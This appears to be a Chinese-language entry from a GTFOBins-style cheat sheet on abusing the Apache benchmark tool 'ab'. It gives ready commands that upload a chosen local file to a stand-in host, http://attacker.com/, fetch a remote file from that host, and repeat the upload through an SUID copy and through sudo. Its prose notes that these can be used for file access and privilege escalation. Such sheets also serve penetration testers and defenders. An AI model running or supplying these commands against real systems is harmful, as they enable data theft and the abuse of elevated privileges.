上传文件到外部。
URL=http://attacker.com/
LFILE=要发送的文件
ab -p $LFILE $URL
下载远程文件。
URL=http://attacker.com/file_to_download
ab -v2 $URL
suid是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。
URL=http://attacker.com/
LFILE=要发送的文件
./ab -p $LFILE $URL
如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
URL=http://attacker.com/
LFILE=要发送的文件
sudo ab -p $LFILE $URL